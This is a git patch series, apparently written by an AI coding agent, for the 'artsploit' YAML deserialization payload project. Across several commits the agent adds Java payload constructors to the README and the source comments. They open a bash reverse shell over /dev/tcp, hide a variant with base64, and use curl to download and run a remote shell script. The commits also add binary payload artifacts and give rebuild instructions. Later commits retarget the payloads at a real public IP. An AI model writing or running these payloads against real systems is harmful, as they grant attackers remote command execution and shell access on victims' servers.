From f507e1913871ddf869b6a8982cc86b5c42250480 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Tue, 7 Oct 2025 15:57:01 +0000 Subject: [PATCH 1/7] Initial plan From 3d76659c71eeef056147c93997fc6d4dd93869c0 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Tue, 7 Oct 2025 16:02:44 +0000 Subject: [PATCH 2/7] Initial plan Co-authored-by: artsploit <44605151+artsploit@users.noreply.github.com> --- src/artsploit/AwesomeScriptEngineFactory.class | Bin 0 -> 1692 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 src/artsploit/AwesomeScriptEngineFactory.class diff --git a/src/artsploit/AwesomeScriptEngineFactory.class b/src/artsploit/AwesomeScriptEngineFactory.class new file mode 100644 index 0000000000000000000000000000000000000000..344dbf15aa6491bb8fcf5bb3458b0e2ee66e0ffb GIT binary patch literal 1692 zcma)6TTc@~7(G)eEwxzgUZJ4KRl8o1giC@1jImH+2|oBVER(v}?rwHxwLJQ3eAO2; zKKKLtQRgv$il6I*ayG>z4V6YLi<5|y38+BXx zh9ZMuT*>09sZ-9Uwk~UFzugU_tx~uyFxd>>T6?cTucpe4^fnslZAzQkM=6XlcSB#d zPO`V!pqTNxcfe}qimc3bRNGg5$2o>a2n}h5`d;o{@H{R?!Ldl0Z+{skl-{0jZ~20L!iYSfx{z%v+p>-6LO-IL)I8 zj@ul!MUGb_E9xZPftaNknjzSc0e!RzjBu+?yzeKoO5s8JZ7Kc6J7Bx3AzMrPSO7(Y&xye3X*1f65lfLN zdr@GkO~(vP{``R~m|4UGuJKPGaD%^vUcUJ^;5x=rjrIiJ`MEC;Uy&Ny%~80T#t62E8^DO$M literal 0 HcmV?d00001 From 3a9bb0b620bd25a040675ccdb4bfe155cff471d3 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Tue, 7 Oct 2025 16:07:05 +0000 Subject: [PATCH 3/7] Add additional payload examples from Issue #3 Co-authored-by: artsploit <44605151+artsploit@users.noreply.github.com> --- .gitignore | 3 +- README.md | 38 ++++++++++++++++++ .../AwesomeScriptEngineFactory.class | Bin 1692 -> 0 bytes src/artsploit/AwesomeScriptEngineFactory.java | 34 ++++++++++++++++ yaml-payload.jar | Bin 0 -> 2542 bytes 5 files changed, 74 insertions(+), 1 deletion(-) delete mode 100644 src/artsploit/AwesomeScriptEngineFactory.class create mode 100644 yaml-payload.jar diff --git a/.gitignore b/.gitignore index 712722e..d932d63 100644 --- a/.gitignore +++ b/.gitignore @@ -1,4 +1,5 @@ .idea/* ./out/* ./yaml-payload.jar -./yaml-payload.yml \ No newline at end of file +./yaml-payload.yml +*.class \ No newline at end of file diff --git a/README.md b/README.md index d4c4122..469a67f 100644 --- a/README.md +++ b/README.md @@ -13,3 +13,41 @@ jar -cvf yaml-payload.jar -C src/ . ``` Then place the 'yaml-payload.jar' file in to the web server folder (e.g. artsploit.com/yaml-payload.jar) + +## Additional Payload Examples + +The [AwesomeScriptEngineFactory.java](./src/artsploit/AwesomeScriptEngineFactory.java) file includes additional commented-out payload examples that you can use: + +### Reverse Shell Payloads +```java +public AwesomeScriptEngineFactory() { + String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"}; + String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"}; + try { + Runtime.getRuntime().exec(cmd); + Runtime.getRuntime().exec(jex); + Runtime.getRuntime().exec("echo $jex"); + } catch (IOException e) { + e.printStackTrace(); + } +} +``` + +### Download and Execute Payloads +```java +public AwesomeScriptEngineFactory() { + RunCmd("curl 10.10.14.4/shell.sh -o /tmp/shell.sh"); + RunCmd("bash /tmp/shell.sh"); +} + +public String RunCmd(String Cmd) { + try { + Runtime.getRuntime().exec(Cmd); + } catch (IOException e) { + e.printStackTrace(); + } + return null; +} +``` + +Simply uncomment the desired payload in the source file and rebuild the JAR. diff --git a/src/artsploit/AwesomeScriptEngineFactory.class b/src/artsploit/AwesomeScriptEngineFactory.class deleted file mode 100644 index 344dbf15aa6491bb8fcf5bb3458b0e2ee66e0ffb..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1692 zcma)6TTc@~7(G)eEwxzgUZJ4KRl8o1giC@1jImH+2|oBVER(v}?rwHxwLJQ3eAO2; zKKKLtQRgv$il6I*ayG>z4V6YLi<5|y38+BXx zh9ZMuT*>09sZ-9Uwk~UFzugU_tx~uyFxd>>T6?cTucpe4^fnslZAzQkM=6XlcSB#d zPO`V!pqTNxcfe}qimc3bRNGg5$2o>a2n}h5`d;o{@H{R?!Ldl0Z+{skl-{0jZ~20L!iYSfx{z%v+p>-6LO-IL)I8 zj@ul!MUGb_E9xZPftaNknjzSc0e!RzjBu+?yzeKoO5s8JZ7Kc6J7Bx3AzMrPSO7(Y&xye3X*1f65lfLN zdr@GkO~(vP{``R~m|4UGuJKPGaD%^vUcUJ^;5x=rjrIiJ`MEC;Uy&Ny%~80T#t62E8^DO$M diff --git a/src/artsploit/AwesomeScriptEngineFactory.java b/src/artsploit/AwesomeScriptEngineFactory.java index d4d5ce5..c7faa21 100644 --- a/src/artsploit/AwesomeScriptEngineFactory.java +++ b/src/artsploit/AwesomeScriptEngineFactory.java @@ -16,6 +16,40 @@ public AwesomeScriptEngineFactory() { } } + // Additional payload examples (commented out by default): + + // Reverse shell payloads: + /* + public AwesomeScriptEngineFactory() { + String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"}; + String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"}; + try { + Runtime.getRuntime().exec(cmd); + Runtime.getRuntime().exec(jex); + Runtime.getRuntime().exec("echo $jex"); + } catch (IOException e) { + e.printStackTrace(); + } + } + */ + + // Download and execute payload with helper method: + /* + public AwesomeScriptEngineFactory() { + RunCmd("curl 10.10.14.4/shell.sh -o /tmp/shell.sh"); + RunCmd("bash /tmp/shell.sh"); + } + + public String RunCmd(String Cmd) { + try { + Runtime.getRuntime().exec(Cmd); + } catch (IOException e) { + e.printStackTrace(); + } + return null; + } + */ + @Override public String getEngineName() { return null; diff --git a/yaml-payload.jar b/yaml-payload.jar new file mode 100644 index 0000000000000000000000000000000000000000..0763ae0530073c444603d067b79e112fba709739 GIT binary patch literal 2542 zcma);2UJs88pi`ffjAIKLiezOpah7>uyk;cZYZHBMd=erA|}}cDI!%sDH(bgnt)(H z5Rg$?D1yu&GDwp?w1_~mE={D(Aa3I9Lg38o?Dx()@4j=s|Gocr@A4AhI24Z|rq;m(J zkLIiYVLsL?&?^{D@*!df0dR*e4^x~U28S~9@(I8bLl7!3C3x4XK9vEIimhsIpS6Gu zyj$h$KVBpHdJs1eR`6Hn%7I^8r-0Rk6i*tAQAlWm;es9NAqBZ z@{EE|B>WB3ANYg&_m1D-t$FYvR<8wp}q*kTcZJX^3jNd0AvB2mQi@>PMQ+ULdi@%g5GCr{)*q)*7%-r{~CbJ`^ z4_&5xpEj%FqCSlk@()!pr57+8zTyzrG@%0RNd+$AoG(E33@ ziBlhHB3!4jBDgvMJ)!VOqHC%^fDxX@tnq0V@>PyYTGYi!r0Im9QxW)|lN8h?jQO6ZxWq-pQv!1BsOK@;cqdeRQ}BdaHL49nBnJXTR-TFVpr#~dK^^T zwL(TOK}+IB5dX@@WR=)9S_$b+OUIZmOP4BgJYj;%|vLF;pgO513RnSD(@;9ls$+Y$5mj`CZO(_zDoTjyVFIiv_q(S)<1?y$ay%1*UsiT zXJsfz!O+Ij;=o|Lq_8-Y^+-F_Pjd5$Y{TU-Ng6q+_hsdq$D40t0%HwVuL|$pmfc?B z3olA;-trXxt*s@p#W+a5!P#k2`Bw{5b@_&1r%CCt(17P>JfOG13@_Wfm@t#%&=GnY z{O@|tc6r&I=+5BsazCpT39v!JCrT@21*o9tuWd=W?CKSF{tzA?Of@)XB zY^v2^p-Ux}OJ$d8voPS!Mg^*+|G15`$<9oWU`$-XqsM9|eiCf`ZFzK&q#+L0H=FHr z$%iqIS5kVOsS8qfQ?q(N^0hv5SX#GF_S~#>eDyVLl&^HO6>RfHz-7>oP5Et7H9;LU zI(TcH_I-(cq(x&bVJ+qgs^OT7#f6`~BKdj!ve`V$Ev5YI`5f@1NbE2nQ%NDkMF2>Qkerf5(L}2Fuy@aKPtMp5jN_8ciQLY`9R-O69AWnMT&{=0!jR8tGb}wOiBFL>t3=1hqI%T!1 z57qjdw1Vx}6YHNE2uFeo?@fal)p53np>5wvc}8|Z2iH;mtt^P z%_G#YiUG{x2NJ=>4FMdc`hStlruyO7$26PqN2Q#kWi$OC3|PZ`DF@-%Gk^dr7k@(J zgBjX6XW-!Tfq6EeIjPAe^g*n#hWifo^?$`{PJc(4%5u#SL0pGPeBg_%)e0EsxpYKs5>FY5xb4u6Q3{q}DVD#gP9 literal 0 HcmV?d00001 From c601069bbd6b4eeda89f8fb4bb857204e9c07d04 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Tue, 7 Oct 2025 16:08:11 +0000 Subject: [PATCH 4/7] Fix .gitignore to exclude build artifacts Co-authored-by: artsploit <44605151+artsploit@users.noreply.github.com> --- .gitignore | 6 +++--- yaml-payload.jar | Bin 2542 -> 0 bytes 2 files changed, 3 insertions(+), 3 deletions(-) delete mode 100644 yaml-payload.jar diff --git a/.gitignore b/.gitignore index d932d63..036f302 100644 --- a/.gitignore +++ b/.gitignore @@ -1,5 +1,5 @@ .idea/* -./out/* -./yaml-payload.jar -./yaml-payload.yml +out/* +yaml-payload.jar +yaml-payload.yml *.class \ No newline at end of file diff --git a/yaml-payload.jar b/yaml-payload.jar deleted file mode 100644 index 0763ae0530073c444603d067b79e112fba709739..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2542 zcma);2UJs88pi`ffjAIKLiezOpah7>uyk;cZYZHBMd=erA|}}cDI!%sDH(bgnt)(H z5Rg$?D1yu&GDwp?w1_~mE={D(Aa3I9Lg38o?Dx()@4j=s|Gocr@A4AhI24Z|rq;m(J zkLIiYVLsL?&?^{D@*!df0dR*e4^x~U28S~9@(I8bLl7!3C3x4XK9vEIimhsIpS6Gu zyj$h$KVBpHdJs1eR`6Hn%7I^8r-0Rk6i*tAQAlWm;es9NAqBZ z@{EE|B>WB3ANYg&_m1D-t$FYvR<8wp}q*kTcZJX^3jNd0AvB2mQi@>PMQ+ULdi@%g5GCr{)*q)*7%-r{~CbJ`^ z4_&5xpEj%FqCSlk@()!pr57+8zTyzrG@%0RNd+$AoG(E33@ ziBlhHB3!4jBDgvMJ)!VOqHC%^fDxX@tnq0V@>PyYTGYi!r0Im9QxW)|lN8h?jQO6ZxWq-pQv!1BsOK@;cqdeRQ}BdaHL49nBnJXTR-TFVpr#~dK^^T zwL(TOK}+IB5dX@@WR=)9S_$b+OUIZmOP4BgJYj;%|vLF;pgO513RnSD(@;9ls$+Y$5mj`CZO(_zDoTjyVFIiv_q(S)<1?y$ay%1*UsiT zXJsfz!O+Ij;=o|Lq_8-Y^+-F_Pjd5$Y{TU-Ng6q+_hsdq$D40t0%HwVuL|$pmfc?B z3olA;-trXxt*s@p#W+a5!P#k2`Bw{5b@_&1r%CCt(17P>JfOG13@_Wfm@t#%&=GnY z{O@|tc6r&I=+5BsazCpT39v!JCrT@21*o9tuWd=W?CKSF{tzA?Of@)XB zY^v2^p-Ux}OJ$d8voPS!Mg^*+|G15`$<9oWU`$-XqsM9|eiCf`ZFzK&q#+L0H=FHr z$%iqIS5kVOsS8qfQ?q(N^0hv5SX#GF_S~#>eDyVLl&^HO6>RfHz-7>oP5Et7H9;LU zI(TcH_I-(cq(x&bVJ+qgs^OT7#f6`~BKdj!ve`V$Ev5YI`5f@1NbE2nQ%NDkMF2>Qkerf5(L}2Fuy@aKPtMp5jN_8ciQLY`9R-O69AWnMT&{=0!jR8tGb}wOiBFL>t3=1hqI%T!1 z57qjdw1Vx}6YHNE2uFeo?@fal)p53np>5wvc}8|Z2iH;mtt^P z%_G#YiUG{x2NJ=>4FMdc`hStlruyO7$26PqN2Q#kWi$OC3|PZ`DF@-%Gk^dr7k@(J zgBjX6XW-!Tfq6EeIjPAe^g*n#hWifo^?$`{PJc(4%5u#SL0pGPeBg_%)e0EsxpYKs5>FY5xb4u6Q3{q}DVD#gP9 From 50624ab19dd11fed94af9b3b55d272c6803b0a44 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Mon, 13 Oct 2025 07:54:48 +0000 Subject: [PATCH 5/7] Improve payload examples documentation and clarity Co-authored-by: artsploit <44605151+artsploit@users.noreply.github.com> --- README.md | 14 ++-- src/artsploit/AwesomeScriptEngineFactory.java | 65 ++++++++++--------- 2 files changed, 43 insertions(+), 36 deletions(-) diff --git a/README.md b/README.md index 469a67f..49c4a97 100644 --- a/README.md +++ b/README.md @@ -16,9 +16,10 @@ Then place the 'yaml-payload.jar' file in to the web server folder (e.g. artsplo ## Additional Payload Examples -The [AwesomeScriptEngineFactory.java](./src/artsploit/AwesomeScriptEngineFactory.java) file includes additional commented-out payload examples that you can use: +The [AwesomeScriptEngineFactory.java](./src/artsploit/AwesomeScriptEngineFactory.java) file includes additional payload examples in the comments. To use them, replace the constructor in the file with one of the examples below and rebuild. -### Reverse Shell Payloads +### Example 1: Reverse Shell Payloads +Replace the constructor with: ```java public AwesomeScriptEngineFactory() { String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"}; @@ -33,7 +34,8 @@ public AwesomeScriptEngineFactory() { } ``` -### Download and Execute Payloads +### Example 2: Download and Execute Payloads +Replace the constructor with this and add the `RunCmd` helper method to the class: ```java public AwesomeScriptEngineFactory() { RunCmd("curl 10.10.14.4/shell.sh -o /tmp/shell.sh"); @@ -50,4 +52,8 @@ public String RunCmd(String Cmd) { } ``` -Simply uncomment the desired payload in the source file and rebuild the JAR. +After modifying the source file, rebuild the JAR: +```bash +javac src/artsploit/AwesomeScriptEngineFactory.java +jar -cvf yaml-payload.jar -C src/ . +``` diff --git a/src/artsploit/AwesomeScriptEngineFactory.java b/src/artsploit/AwesomeScriptEngineFactory.java index c7faa21..1a9f51e 100644 --- a/src/artsploit/AwesomeScriptEngineFactory.java +++ b/src/artsploit/AwesomeScriptEngineFactory.java @@ -16,39 +16,40 @@ public AwesomeScriptEngineFactory() { } } - // Additional payload examples (commented out by default): - - // Reverse shell payloads: /* - public AwesomeScriptEngineFactory() { - String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"}; - String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"}; - try { - Runtime.getRuntime().exec(cmd); - Runtime.getRuntime().exec(jex); - Runtime.getRuntime().exec("echo $jex"); - } catch (IOException e) { - e.printStackTrace(); - } - } - */ - - // Download and execute payload with helper method: - /* - public AwesomeScriptEngineFactory() { - RunCmd("curl 10.10.14.4/shell.sh -o /tmp/shell.sh"); - RunCmd("bash /tmp/shell.sh"); - } - - public String RunCmd(String Cmd) { - try { - Runtime.getRuntime().exec(Cmd); - } catch (IOException e) { - e.printStackTrace(); - } - return null; - } - */ + * Additional payload examples - replace the constructor above with one of these: + * + * Example 1 - Reverse shell payloads: + * + * public AwesomeScriptEngineFactory() { + * String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"}; + * String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"}; + * try { + * Runtime.getRuntime().exec(cmd); + * Runtime.getRuntime().exec(jex); + * Runtime.getRuntime().exec("echo $jex"); + * } catch (IOException e) { + * e.printStackTrace(); + * } + * } + * + * Example 2 - Download and execute payload: + * (Note: add the RunCmd method below to the class when using this) + * + * public AwesomeScriptEngineFactory() { + * RunCmd("curl 10.10.14.4/shell.sh -o /tmp/shell.sh"); + * RunCmd("bash /tmp/shell.sh"); + * } + * + * public String RunCmd(String Cmd) { + * try { + * Runtime.getRuntime().exec(Cmd); + * } catch (IOException e) { + * e.printStackTrace(); + * } + * return null; + * } + */ @Override public String getEngineName() { From 3839f30dc4688d864a473885a2d531532e33ee7c Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Mon, 13 Oct 2025 08:01:01 +0000 Subject: [PATCH 6/7] Fix whitespace and formatting issues Co-authored-by: artsploit <44605151+artsploit@users.noreply.github.com> --- .gitignore | 2 +- src/artsploit/AwesomeScriptEngineFactory.java | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/.gitignore b/.gitignore index 036f302..40cc68c 100644 --- a/.gitignore +++ b/.gitignore @@ -2,4 +2,4 @@ out/* yaml-payload.jar yaml-payload.yml -*.class \ No newline at end of file +*.class diff --git a/src/artsploit/AwesomeScriptEngineFactory.java b/src/artsploit/AwesomeScriptEngineFactory.java index 1a9f51e..d70e40c 100644 --- a/src/artsploit/AwesomeScriptEngineFactory.java +++ b/src/artsploit/AwesomeScriptEngineFactory.java @@ -18,9 +18,9 @@ public AwesomeScriptEngineFactory() { /* * Additional payload examples - replace the constructor above with one of these: - * + * * Example 1 - Reverse shell payloads: - * + * * public AwesomeScriptEngineFactory() { * String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"}; * String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"}; @@ -32,10 +32,10 @@ public AwesomeScriptEngineFactory() { * e.printStackTrace(); * } * } - * + * * Example 2 - Download and execute payload: * (Note: add the RunCmd method below to the class when using this) - * + * * public AwesomeScriptEngineFactory() { * RunCmd("curl 10.10.14.4/shell.sh -o /tmp/shell.sh"); * RunCmd("bash /tmp/shell.sh"); From 1d181c68d5617bebadd6136c8b0a1643b0ea49c5 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Mon, 13 Oct 2025 09:21:29 +0000 Subject: [PATCH 7/7] Update IP address in payload examples to 1.1.1.1 Co-authored-by: artsploit <44605151+artsploit@users.noreply.github.com> --- README.md | 4 ++-- src/artsploit/AwesomeScriptEngineFactory.java | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 49c4a97..28fc964 100644 --- a/README.md +++ b/README.md @@ -22,7 +22,7 @@ The [AwesomeScriptEngineFactory.java](./src/artsploit/AwesomeScriptEngineFactory Replace the constructor with: ```java public AwesomeScriptEngineFactory() { - String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"}; + String [] cmd={"bash","-c","bash -i >& /dev/tcp/1.1.1.1/4444 0>&1"}; String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"}; try { Runtime.getRuntime().exec(cmd); @@ -38,7 +38,7 @@ public AwesomeScriptEngineFactory() { Replace the constructor with this and add the `RunCmd` helper method to the class: ```java public AwesomeScriptEngineFactory() { - RunCmd("curl 10.10.14.4/shell.sh -o /tmp/shell.sh"); + RunCmd("curl 1.1.1.1/shell.sh -o /tmp/shell.sh"); RunCmd("bash /tmp/shell.sh"); } diff --git a/src/artsploit/AwesomeScriptEngineFactory.java b/src/artsploit/AwesomeScriptEngineFactory.java index d70e40c..309edef 100644 --- a/src/artsploit/AwesomeScriptEngineFactory.java +++ b/src/artsploit/AwesomeScriptEngineFactory.java @@ -22,7 +22,7 @@ public AwesomeScriptEngineFactory() { * Example 1 - Reverse shell payloads: * * public AwesomeScriptEngineFactory() { - * String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"}; + * String [] cmd={"bash","-c","bash -i >& /dev/tcp/1.1.1.1/4444 0>&1"}; * String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"}; * try { * Runtime.getRuntime().exec(cmd); @@ -37,7 +37,7 @@ public AwesomeScriptEngineFactory() { * (Note: add the RunCmd method below to the class when using this) * * public AwesomeScriptEngineFactory() { - * RunCmd("curl 10.10.14.4/shell.sh -o /tmp/shell.sh"); + * RunCmd("curl 1.1.1.1/shell.sh -o /tmp/shell.sh"); * RunCmd("bash /tmp/shell.sh"); * } *